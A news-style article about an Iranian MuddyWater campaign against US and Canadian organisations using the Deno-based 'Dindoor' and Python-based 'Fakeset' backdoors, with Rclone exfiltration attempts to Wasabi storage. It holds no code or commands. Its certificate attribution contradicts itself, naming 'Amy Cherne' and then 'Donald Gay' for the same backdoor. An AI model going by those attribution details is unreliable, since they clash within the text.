MuddyWater's Latest Hack: Uncovering the 'Dindoor' Backdoor Campaign
In a recent series of high-profile attacks, Iranian hacking group MuddyWater has targeted several major US companies, leaving cybersecurity experts scrambling to understand the scope of the breach and prevent further exploitation. The campaign, which began in early February and continues unabated, has already raised alarms among the security community, with multiple organizations reporting suspicious activity on their networks.
The Threat Hunter Team at Broadcom's Symantec and Carbon Black detected the campaign, revealing a previously unknown backdoor dubbed 'Dindoor'. This backdoor, signed with a certificate issued to "Amy Cherne", leverages Deno, a secure runtime for JavaScript and TypeScript, to execute malicious code on compromised networks. The researchers also observed an attempt to exfiltrate data from one of the targeted companies using Rclone, a command-line program to manage files on cloud storage, to a Wasabi cloud storage bucket.
The 'Dindoor' Backdoor: A Reused Certificate Tie to MuddyWater
The Dindoor backdoor was found on the networks of multiple organizations, including the Israeli outpost of a US software company that supplies defense and aerospace sectors, a US bank, and a Canadian non-profit organization. What's striking is that the same certificate used to sign this backdoor has been reused by MuddyWater in previous campaigns. Specifically, the Donald Gay certificate has been linked to malware samples associated with MuddyWater since 2017.
The use of reused certificates ties the 'Dindoor' backdoor campaign directly to Iranian hacking group MuddyWater, which has been active since 2017 and is associated with the Ministry of Intelligence and Security (MOIS), also known as Seedworm, Temp Zagros, and Static Kitten. This malware family includes Stagecomp and Darkcomp, which have been linked to MuddyWater by security vendors such as Google, Microsoft, and Kaspersky.
Malware Ties: Unpacking the 'Fakeset' Backdoor
A different backdoor called Fakeset was discovered on the networks of a US airport. Signed with certificates issued to "Amy Cherne" and "Donald Gay", this backdoor leverages Python to execute malicious code on compromised systems. Notably, the Donald Gay certificate has been linked to malware samples associated with MuddyWater in the past.
The Fakeset backdoor was downloaded from two servers belonging to Backblaze cloud storage company. Researchers also observed an attempt to exfiltrate data using Rclone and a Wasabi cloud storage bucket, although it is unclear if this attempt was successful. The use of the same certificates as seen with the 'Dindoor' backdoor suggests that MuddyWater was involved in this campaign.
The Implications: Preventing Future Attacks
While cybersecurity experts have disrupted these breaches, other organizations could still be vulnerable to attack. "While we have disrupted these breaches, other organizations could still be vulnerable to attack," warned the Threat Hunter Team. To prevent similar attacks, it is essential for companies to stay vigilant and implement robust security measures, including regular network monitoring, patching of vulnerabilities, and employee training on cybersecurity best practices.
In conclusion, MuddyWater's latest campaign highlights the ongoing threat posed by Iranian hacking groups and the importance of staying informed about emerging threats. By understanding the tactics, techniques, and procedures (TTPs) used by these groups, organizations can better protect themselves against similar attacks in the future.
Keywords: #MuddyWater #IranianHackingGroup #DindoorBackdoor #Cybersecurity #DataBreach #Malware #Vulnerability #NetworkSecurity